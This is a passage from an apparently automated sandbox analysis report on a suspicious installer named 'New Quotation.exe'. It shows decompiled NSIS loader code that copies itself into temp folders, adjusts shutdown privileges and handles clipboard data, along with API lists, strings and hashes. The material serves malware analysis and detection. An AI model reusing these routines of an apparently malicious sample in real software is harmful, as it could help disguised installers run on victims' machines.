														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t189) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\Desktop\\New Quotation.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\New Quotation.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\New Quotation.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\New Quotation.exe\" ") {
													_t190 = E00405B08(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t220 = L"C:\\Users\\Arthur\\Desktop";
													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t220);
														}
														E0040653D(0x436000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x436800 = _t144;
														do {
															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\New Quotation.exe", 0x42aa28, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t153 = E00405B20(0x42aa28);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\New Quotation.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}



















































                                                                                                                                                                                          0x0040353b
                                                                                                                                                                                          0x0040353c
                                                                                                                                                                                          0x00403543
                                                                                                                                                                                          0x00403546
                                                                                                                                                                                          0x0040354d
                                                                                                                                                                                          0x00403550
                                                                                                                                                                                          0x00403563
                                                                                                                                                                                          0x00403569
                                                                                                                                                                                          0x0040356c
                                                                                                                                                                                          0x0040356f
                                                                                                                                                                                          0x0040357d
                                                                                                                                                                                          0x00403585
                                                                                                                                                                                          0x00403590
                                                                                                                                                                                          0x004035a9
                                                                                                                                                                                          0x004035ab
                                                                                                                                                                                          0x004035b3
                                                                                                                                                                                          0x004035b3
                                                                                                                                                                                          0x004035be
                                                                                                                                                                                          0x004035c0
                                                                                                                                                                                          0x004035c0
                                                                                                                                                                                          0x004035d5
                                                                                                                                                                                          0x004035fa
                                                                                                                                                                                          0x00403608
                                                                                                                                                                                          0x0040360b
                                                                                                                                                                                          0x00403612
                                                                                                                                                                                          0x00403619
                                                                                                                                                                                          0x00403619
                                                                                                                                                                                          0x00403612
                                                                                                                                                                                          0x0040361b
                                                                                                                                                                                          0x00403620
                                                                                                                                                                                          0x00403621
                                                                                                                                                                                          0x0040362d
                                                                                                                                                                                          0x00403631
                                                                                                                                                                                          0x00403638
                                                                                                                                                                                          0x00403646
                                                                                                                                                                                          0x0040364b
                                                                                                                                                                                          0x00403652
                                                                                                                                                                                          0x00403656
                                                                                                                                                                                          0x0040365a
                                                                                                                                                                                          0x0040365c
                                                                                                                                                                                          0x0040365c
                                                                                                                                                                                          0x0040365a
                                                                                                                                                                                          0x00403663
                                                                                                                                                                                          0x0040366a
                                                                                                                                                                                          0x00403670
                                                                                                                                                                                          0x00403688
                                                                                                                                                                                          0x00403698
                                                                                                                                                                                          0x0040369d
                                                                                                                                                                                          0x004036a3
                                                                                                                                                                                          0x004036aa
                                                                                                                                                                                          0x004036b1
                                                                                                                                                                                          0x004036b3
                                                                                                                                                                                          0x004036b4
                                                                                                                                                                                          0x004036be
                                                                                                                                                                                          0x004036c5
                                                                                                                                                                                          0x004036c7
                                                                                                                                                                                          0x004036c9
                                                                                                                                                                                          0x004036c9
                                                                                                                                                                                          0x004036dc
                                                                                                                                                                                          0x004036de
                                                                                                                                                                                          0x004037d8
                                                                                                                                                                                          0x004037d8
                                                                                                                                                                                          0x004037db
                                                                                                                                                                                          0x004037de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004036e8
                                                                                                                                                                                          0x004036e9
                                                                                                                                                                                          0x004036ec
                                                                                                                                                                                          0x004036f5
                                                                                                                                                                                          0x004036f5
                                                                                                                                                                                          0x004036f8
                                                                                                                                                                                          0x004036fb
                                                                                                                                                                                          0x004036fe
                                                                                                                                                                                          0x00403701
                                                                                                                                                                                          0x00403701
                                                                                                                                                                                          0x00403701
                                                                                                                                                                                          0x00403702
                                                                                                                                                                                          0x00403706
                                                                                                                                                                                          0x004037c6
                                                                                                                                                                                          0x004037cf
                                                                                                                                                                                          0x004037d1
                                                                                                                                                                                          0x004037d4
                                                                                                                                                                                          0x004037d7
                                                                                                                                                                                          0x004037d7
                                                                                                                                                                                          0x004037d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040370c
                                                                                                                                                                                          0x0040370d
                                                                                                                                                                                          0x0040370e
                                                                                                                                                                                          0x00403712
                                                                                                                                                                                          0x0040372c
                                                                                                                                                                                          0x00403733
                                                                                                                                                                                          0x00403746
                                                                                                                                                                                          0x00403747
                                                                                                                                                                                          0x0040375c
                                                                                                                                                                                          0x00403761
                                                                                                                                                                                          0x00403763
                                                                                                                                                                                          0x00403765
                                                                                                                                                                                          0x00403781
                                                                                                                                                                                          0x00403788
                                                                                                                                                                                          0x0040379b
                                                                                                                                                                                          0x0040379c
                                                                                                                                                                                          0x004037b1
                                                                                                                                                                                          0x004037b7
                                                                                                                                                                                          0x004037b9
                                                                                                                                                                                          0x004037bb
                                                                                                                                                                                          0x004037c3
                                                                                                                                                                                          0x004037c5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004037c5
                                                                                                                                                                                          0x004037bf
                                                                                                                                                                                          0x004037c1
                                                                                                                                                                                          0x004037e6
                                                                                                                                                                                          0x004037ea
                                                                                                                                                                                          0x004037f3
                                                                                                                                                                                          0x004037f8
                                                                                                                                                                                          0x004037fe
                                                                                                                                                                                          0x00403809
                                                                                                                                                                                          0x0040380b
                                                                                                                                                                                          0x00403810
                                                                                                                                                                                          0x00403812
                                                                                                                                                                                          0x0040386a
                                                                                                                                                                                          0x0040386f
                                                                                                                                                                                          0x00403878
                                                                                                                                                                                          0x0040387f
                                                                                                                                                                                          0x00403882
                                                                                                                                                                                          0x00403a59
                                                                                                                                                                                          0x00403a59
                                                                                                                                                                                          0x00403a5e
                                                                                                                                                                                          0x00403a67
                                                                                                                                                                                          0x00403a84
                                                                                                                                                                                          0x00403afc
                                                                                                                                                                                          0x00403afc
                                                                                                                                                                                          0x00403b04
                                                                                                                                                                                          0x00403b06
                                                                                                                                                                                          0x00403b06
                                                                                                                                                                                          0x00403b0c
                                                                                                                                                                                          0x00403b0c
                                                                                                                                                                                          0x00403a9b
                                                                                                                                                                                          0x00403aa7
                                                                                                                                                                                          0x00403ab8
                                                                                                                                                                                          0x00403abf
                                                                                                                                                                                          0x00403ac6
                                                                                                                                                                                          0x00403ac6
                                                                                                                                                                                          0x00403ace
                                                                                                                                                                                          0x00403ada
                                                                                                                                                                                          0x00403ae8
                                                                                                                                                                                          0x00403af3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403adc
                                                                                                                                                                                          0x00403adc
                                                                                                                                                                                          0x00403add
                                                                                                                                                                                          0x00403adf
                                                                                                                                                                                          0x00403ae0
                                                                                                                                                                                          0x00403ae1
                                                                                                                                                                                          0x00403ae6
                                                                                                                                                                                          0x00403af5
                                                                                                                                                                                          0x00403af7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403af7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403ae6
                                                                                                                                                                                          0x00403ada
                                                                                                                                                                                          0x00403a71
                                                                                                                                                                                          0x00403a78
                                                                                                                                                                                          0x00403a78
                                                                                                                                                                                          0x0040388e
                                                                                                                                                                                          0x00403935
                                                                                                                                                                                          0x00403935
                                                                                                                                                                                          0x00403941
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403941
                                                                                                                                                                                          0x0040389f
                                                                                                                                                                                          0x004038a7
                                                                                                                                                                                          0x004038f9
                                                                                                                                                                                          0x004038f9
                                                                                                                                                                                          0x004038ff
                                                                                                                                                                                          0x00403906
                                                                                                                                                                                          0x00403954
                                                                                                                                                                                          0x00403956
                                                                                                                                                                                          0x0040395b
                                                                                                                                                                                          0x0040395d
                                                                                                                                                                                          0x00403965
                                                                                                                                                                                          0x00403965
                                                                                                                                                                                          0x00403970
                                                                                                                                                                                          0x00403975
                                                                                                                                                                                          0x0040397c
                                                                                                                                                                                          0x00403982
                                                                                                                                                                                          0x00403984
                                                                                                                                                                                          0x00403a57
                                                                                                                                                                                          0x00403a57
                                                                                                                                                                                          0x00403a57
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040398a
                                                                                                                                                                                          0x0040398a
                                                                                                                                                                                          0x0040398c
                                                                                                                                                                                          0x0040398d
                                                                                                                                                                                          0x00403996
                                                                                                                                                                                          0x0040398f
                                                                                                                                                                                          0x0040398f
                                                                                                                                                                                          0x0040398f
                                                                                                                                                                                          0x0040399c
                                                                                                                                                                                          0x004039a4
                                                                                                                                                                                          0x004039ab
                                                                                                                                                                                          0x004039b3
                                                                                                                                                                                          0x004039b3
                                                                                                                                                                                          0x004039c0
                                                                                                                                                                                          0x004039cc
                                                                                                                                                                                          0x004039d6
                                                                                                                                                                                          0x004039d6
                                                                                                                                                                                          0x004039d8
                                                                                                                                                                                          0x004039df
                                                                                                                                                                                          0x004039e9
                                                                                                                                                                                          0x004039f5
                                                                                                                                                                                          0x004039fb
                                                                                                                                                                                          0x00403a01
                                                                                                                                                                                          0x00403a04
                                                                                                                                                                                          0x00403a0e
                                                                                                                                                                                          0x00403a14
                                                                                                                                                                                          0x00403a16
                                                                                                                                                                                          0x00403a1a
                                                                                                                                                                                          0x00403a2b
                                                                                                                                                                                          0x00403a31
                                                                                                                                                                                          0x00403a36
                                                                                                                                                                                          0x00403a38
                                                                                                                                                                                          0x00403a3b
                                                                                                                                                                                          0x00403a41
                                                                                                                                                                                          0x00403a41
                                                                                                                                                                                          0x00403a38
                                                                                                                                                                                          0x00403a16
                                                                                                                                                                                          0x00403a44
                                                                                                                                                                                          0x00403a4b
                                                                                                                                                                                          0x00403a4b
                                                                                                                                                                                          0x00403a4b
                                                                                                                                                                                          0x00403a4b
                                                                                                                                                                                          0x00403a52
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403a52
                                                                                                                                                                                          0x00403984
                                                                                                                                                                                          0x00403908
                                                                                                                                                                                          0x0040390b
                                                                                                                                                                                          0x0040390f
                                                                                                                                                                                          0x00403914
                                                                                                                                                                                          0x00403916
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403922
                                                                                                                                                                                          0x0040392d
                                                                                                                                                                                          0x00403932
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403932
                                                                                                                                                                                          0x004038b0
                                                                                                                                                                                          0x004038c8
                                                                                                                                                                                          0x004038d9
                                                                                                                                                                                          0x004038da
                                                                                                                                                                                          0x004038de
                                                                                                                                                                                          0x004038e0
                                                                                                                                                                                          0x004038ee
                                                                                                                                                                                          0x004038f5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004038f5
                                                                                                                                                                                          0x004038f7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004038f7
                                                                                                                                                                                          0x0040381a
                                                                                                                                                                                          0x00403826
                                                                                                                                                                                          0x0040382b
                                                                                                                                                                                          0x00403830
                                                                                                                                                                                          0x00403832
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040383a
                                                                                                                                                                                          0x00403842
                                                                                                                                                                                          0x00403853
                                                                                                                                                                                          0x0040385b
                                                                                                                                                                                          0x0040385d
                                                                                                                                                                                          0x00403862
                                                                                                                                                                                          0x00403864
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403864
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004037c1
                                                                                                                                                                                          0x0040376a
                                                                                                                                                                                          0x0040376c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040376e
                                                                                                                                                                                          0x00403772
                                                                                                                                                                                          0x00403776
                                                                                                                                                                                          0x0040377d
                                                                                                                                                                                          0x0040377d
                                                                                                                                                                                          0x0040377d
                                                                                                                                                                                          0x0040377d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040377d
                                                                                                                                                                                          0x00403778
                                                                                                                                                                                          0x0040377b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040377b
                                                                                                                                                                                          0x00403714
                                                                                                                                                                                          0x00403718
                                                                                                                                                                                          0x0040371b
                                                                                                                                                                                          0x00403722
                                                                                                                                                                                          0x00403722
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403722
                                                                                                                                                                                          0x0040371d
                                                                                                                                                                                          0x00403720
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403720
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004036ee
                                                                                                                                                                                          0x004036ee
                                                                                                                                                                                          0x004036ef
                                                                                                                                                                                          0x004036f0
                                                                                                                                                                                          0x004036f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004036ee
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                                                                                                                          • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                                                                                                                          • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\New Quotation.exe" ,00000020,"C:\Users\user\Desktop\New Quotation.exe" ,00000000), ref: 004036D6
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                                                                                                                          • DeleteFileW.KERNELBASE(3073), ref: 0040386F
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                                                                                                                            • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\New Quotation.exe" ,00000000,?), ref: 0040397C
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                                                                                                                          • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\New Quotation.exe,0042AA28,00000001), ref: 00403A0E
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                                                                                                                          • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403A78
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\New Quotation.exe" $.tmp$3073$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New Quotation.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                          • API String ID: 3859024572-3554880097
                                                                                                                                                                                          • Opcode ID: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
                                                                                                                                                                                          • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 167 4057e4-4057e7 145->167 168 4057c8-4057e2 SendMessageW * 2 145->168 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 152 4058f0-4058f6 150->152 153 405944-405948 150->153 155 4058d0-4058df ShowWindow * 2 call 4044ce 151->155 156 405909-405912 call 404500 151->156 158 4058f8-405904 call 404472 152->158 159 40591e-40592e ShowWindow 152->159 153->156 162 40594a-405950 153->162 155->150 164 405917-40591b 156->164 158->156 165 405930-405939 call 40559f 159->165 166 40593e-40593f call 404472 159->166 162->156 169 405952-405965 SendMessageW 162->169 165->166 166->153 170 4057f7-40580e call 404499 167->170 171 4057e9-4057f5 SendMessageW 167->171 168->167 172 405a67-405a69 169->172 173 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 169->173 182 405810-405824 ShowWindow 170->182 183 405844-405865 GetDlgItem SendMessageW 170->183 171->170 172->164 180 405998-4059a8 GetWindowRect 173->180 181 4059ab-4059c0 TrackPopupMenu 173->181 180->181 181->172 184 4059c6-4059dd 181->184 185 405833 182->185 186 405826-405831 ShowWindow 182->186 183->172 187 40586b-405883 SendMessageW * 2 183->187 188 4059e2-4059fd SendMessageW 184->188 189 405839-40583f call 4044ce 185->189 186->189 187->172 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->172
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				int _t101;
				long _t104;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4; // 0x10448
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							__eflags = _a12 - _t94;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							__eflags = _t95 - _t156;
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
							__eflags = _t101 - _t171;
							if(_t101 == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
									__eflags = _a4 - _t156;
									_t171 = _t171 + _t104 + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
									__eflags = _t156 - _a8;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x433ecc - _t156; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x434f08, 8);
